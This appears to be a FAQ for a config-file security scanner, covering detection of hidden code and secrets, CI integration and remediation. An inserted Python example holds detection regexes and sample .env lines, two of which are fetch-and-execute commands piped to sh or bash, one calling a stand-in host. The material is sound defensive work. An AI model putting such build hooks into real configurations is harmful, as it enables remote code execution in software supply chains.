Config Scanner FAQ

Find answers to common questions about detecting hidden code in configuration files.

What security risks do config files actually pose?

Configuration files such as .env, .terraform, docker-compose.yml and Kubernetes manifests frequently hold executable patterns alongside credentials, API keys and database passwords. Attackers target these files because they often contain the most sensitive infrastructure data. Hidden code patterns in configs can execute during builds or deployments, bypassing standard code review.

How does the scanner detect executable patterns?

The scanner uses pattern recognition to identify code signatures commonly used to inject executable logic into config files. It detects base64 encoding, shell escapes, variable interpolation tricks, and command substitution syntax. It also flags suspicious import statements and external references that could load malicious code at runtime.

Does it find secrets like API keys and passwords?

Yes. The scanner identifies common patterns for exposed secrets including AWS keys, database credentials, API tokens, and private encryption keys. It recognizes patterns like PRIVATE_KEY=, password:, and secret: assignments across all file types.

Which file types does it scan?

The scanner covers all common infrastructure and config file formats:

  • Environment files (.env, .env.local)
  • Infrastructure-as-code (Terraform, CloudFormation, Ansible)
  • Container configs (Docker, Kubernetes, docker-compose)
  • CI/CD pipeline files (GitHub Actions, GitLab CI, Jenkins)
  • Application configs (JSON, YAML, TOML, INI)
  • Shell scripts used in deployment

How many false positives does it generate?

The scanner is tuned to minimize false positives by requiring multiple pattern indicators before flagging a risk. Each finding is scored by confidence level (critical, high, medium, low) so you can prioritize remediation. You can also configure allowlists for legitimate patterns in your environment.
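As an added illustration (not ConfigGuard's code), here is a minimal Python scanner in the spirit of the three answers above: it matches the indicator classes the FAQ names (command substitution, pipe-to-shell, base64 decoding, remote fetches, secret assignments), sums indicator weights into a confidence level so that a single weak indicator does not become a critical finding, and honours an allowlist. All indicator names, weights, thresholds and sample lines are constructed assumptions for this example.

```python
import re

# name -> (regex, weight); names, weights and thresholds are hypothetical
# choices for this example, not ConfigGuard's rules.
INDICATORS = {
    "command_substitution": (re.compile(r"\$\([^)]*\)|`[^`]+`"), 3),
    "pipe_to_shell": (re.compile(r"\|\s*(sh|bash)\b"), 3),
    "remote_fetch": (re.compile(r"\b(curl|wget)\b[^|]*https?://"), 2),
    "base64_decode": (re.compile(r"\bbase64\s+(-d|--decode)\b"), 2),
    "base64_blob": (re.compile(r"\b[A-Za-z0-9+/]{40,}={0,2}"), 1),
    "secret_assignment": (re.compile(
        r"(?i)(PRIVATE_KEY|password|secret|api[_-]?key|token)\s*[:=]\s*\S+"), 4),
    "password_in_url": (re.compile(r"://[^:/\s]+:[^@\s]+@"), 4),
}
# Summed weight -> level: one strong indicator reaches high, two or more critical.
SEVERITY = ((6, "critical"), (4, "high"), (2, "medium"), (1, "low"))

def severity_for(score):
    for threshold, label in SEVERITY:
        if score >= threshold:
            return label
    return None

def scan_lines(lines, allowlist=(), min_severity="low"):
    """Return (line_no, severity, [indicators]) for every line whose summed
    weight reaches min_severity. Lines matching an allowlist regex are skipped."""
    order = [label for _, label in SEVERITY]
    allow = [re.compile(p) for p in allowlist]
    findings = []
    for n, line in enumerate(lines, 1):
        if any(p.search(line) for p in allow):
            continue  # legitimate pattern for this environment
        hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(line)]
        sev = severity_for(sum(INDICATORS[h][1] for h in hits))
        if sev and order.index(sev) <= order.index(min_severity):
            findings.append((n, sev, hits))
    return findings

# Constructed sample .env lines (not from a real repository); the base64 blob
# decodes to "hello world hello world hello world", the URL uses the .invalid TLD.
SAMPLE_ENV = [
    "APP_NAME=configguard-demo",
    "DATABASE_URL=postgres://app:hunter2@db.internal:5432/app",
    "PRIVATE_KEY=-----BEGIN RSA PRIVATE KEY-----",
    "BUILD_HOOK=$(curl -s https://example.invalid/setup.sh | sh)",
    "SESSION_TOKEN=${SESSION_TOKEN}",
    "POSTINSTALL=echo aGVsbG8gd29ybGQgaGVsbG8gd29ybGQgaGVsbG8gd29ybGQ= | base64 -d | bash",
]
# Values that merely reference an injected variable are acceptable here.
ALLOWLIST = [r"=\$\{[A-Z_]+\}$"]
```

Running `scan_lines(SAMPLE_ENV, allowlist=ALLOWLIST)` reports lines 2 and 3 as high and lines 4 and 6 as critical, while line 5 is suppressed by the allowlist and line 1 carries no indicator.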

Can we integrate it into our CI/CD pipeline?

Yes. The scanner runs as a CLI tool and can be integrated into any CI/CD platform (GitHub Actions, GitLab CI, Jenkins, CircleCI, etc.). It can fail builds if critical risks are found, or run in report-only mode for visibility without blocking deployments.

Does it scan files in git history?

Yes. The scanner can audit your entire git history to find configuration risks that were committed in the past. This catches secrets that have been removed from the current branch but still exist in older commits, which remain a security exposure until the secret is rotated.

What do we do when it finds a risk?

Each finding includes remediation guidance. For secrets, rotate or revoke them immediately. For code injection patterns, remove the suspicious logic or refactor the config to use safer alternatives. For dependency risks, audit and update the external reference. The scanner provides severity levels to help you prioritize.

Is our config data stored on your servers?

No. The scanner runs locally on your infrastructure. All scanning happens on your machines, and no config files or findings are sent to external servers. This keeps your sensitive data private.

How does it compare to other secret scanning tools?

Unlike basic secret scanners that only look for credential patterns, this tool detects hidden code and execution logic in configs. It's designed specifically for supply chain risk and catches risks that general secret scanners miss. It also works across all config file formats, not just source code.

Can we set team-level policies for what's allowed?

Yes. Configure policies per team or repository to define what patterns are acceptable in your environment. You can allowlist specific patterns, set confidence thresholds, and exclude certain files from scanning. Policies enforce consistency across your infrastructure.